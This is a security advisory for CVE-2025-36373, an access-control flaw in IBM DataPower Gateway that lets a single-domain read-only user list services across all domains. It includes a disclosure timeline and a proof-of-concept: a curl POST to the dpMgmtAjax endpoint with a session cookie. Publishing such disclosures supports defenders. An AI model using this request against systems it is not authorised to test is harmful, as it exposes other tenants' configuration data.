CVE-2025-36373

Name

Incorrect administrative access control in IBM DataPower Gateway

CVSS score

4.1 (Medium)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

Product name

IBM DataPower Gateway

Confirmed exploitable versions

10.5.0, 10.6.0, 10.6CD

Researcher

Michał Bartoszuk & Maciej Włodarczyk

Description

In IBM DataPower Gateway 10.6.0.5, a vulnerability was discovered that allows a user to access information about all services in all domains, although their access is restricted to only one domain.
Successful exploitation require access to the low-privileged user with read access.

Proof-of-concept

To reproduce the vulnerability:

Create a user with read-only access to only one, custom domain.
Log in to the application and obtain a session cookie.
Send the following request with valid session cookie:
curl --path-as-is -i -s -k -X $'POST' -H $'Host: [DATAPOWER_WEB_SERVER]:9090' -H $'Content-Length: 62' -H $'Content-Type: application/xml' -b $'ibmwdp=[VALID_COOKIE_VALUE]' --data-binary $'' $'https://[DATAPOWER_WEB_SERVER]:9090/webguiapp/post/dpMgmtAjax'

Observe that the endpoint returns information about all services from all domains, including default one.

Image 1: The response with details about all services from all domains

Timeline

03-10-2025 - Vulnerability reported to vendor
01-04-2026 - Security advisory is published by the vendor
03-06-2026 - PoC published

References

https://www.ibm.com/support/pages/node/7267833
https://www.cve.org/CVERecord?id=CVE-2025-36373